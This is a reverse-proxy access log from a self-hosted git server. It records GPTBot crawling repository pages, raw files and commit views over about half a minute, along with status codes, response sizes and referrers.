GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" +[17/Feb/2026:13:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore" +[17/Feb/2026:13:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" [Client 74.7.227.38] [Length 10761] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" +[17/Feb/2026:13:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" +[17/Feb/2026:13:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 29160] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:13:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 20912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:13:26:37 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" +[17/Feb/2026:13:26:38 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" +[17/Feb/2026:13:26:38 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" +[17/Feb/2026:13:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues" [Client 74.7.227.38] [Length 10093] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" +[17/Feb/2026:13:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" +[17/Feb/2026:13:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" [Client 74.7.227.38] [Length 10759] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" +[17/Feb/2026:13:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" +[17/Feb/2026:13:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" +[17/Feb/2026:13:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" +[17/Feb/2026:13:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" +[17/Feb/2026:13:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" +[17/Feb/2026:13:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver.rss" [Client 74.7.227.38] [Length 2411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" +[17/Feb/2026:13:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11500] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" +[17/Feb/2026:13:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10807] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" +[17/Feb/2026:13:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones" [Client 74.7.227.38] [Length 8456] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:13:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/labels" [Client 74.7.227.38] [Length 7622] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:13:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 34285] [Gzip 7.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" +[17/Feb/2026:13:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html?display=rendered" [Client 74.7.227.38] [Length 14705] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" +[17/Feb/2026:13:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/database.sqlite" +[17/Feb/2026:13:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" +[17/Feb/2026:13:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" +[17/Feb/2026:13:26:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" +[17/Feb/2026:13:26:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" +[17/Feb/2026:13:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10760] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" +[17/Feb/2026:13:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" +[17/Feb/2026:13:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" +[17/Feb/2026:13:26:51 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" +[17/Feb/2026:13:26:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" +[17/Feb/2026:13:26:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:13:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/" +[17/Feb/2026:13:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=projects.sln" [Client 74.7.227.38] [Length 22168] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" +[17/Feb/2026:13:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10950] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" [Client 74.7.227.38] [Length 11076] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" +[17/Feb/2026:13:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10279] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129" +[17/Feb/2026:13:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" [Client 74.7.227.38] [Length 11577] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.vscode" [Client 74.7.227.38] [Length 22585] [Gzip 4.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode" +[17/Feb/2026:13:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11883] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" +[17/Feb/2026:13:26:57 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" +[17/Feb/2026:13:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11301] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" +[17/Feb/2026:13:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12757] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" +[17/Feb/2026:13:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?tab=stars" [Client 74.7.227.38] [Length 7157] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" +[17/Feb/2026:13:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup" [Client 74.7.227.38] [Length 11446] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10906] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71831] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" +[17/Feb/2026:13:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" [Client 74.7.227.38] [Length 10760] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" +[17/Feb/2026:13:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15177] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 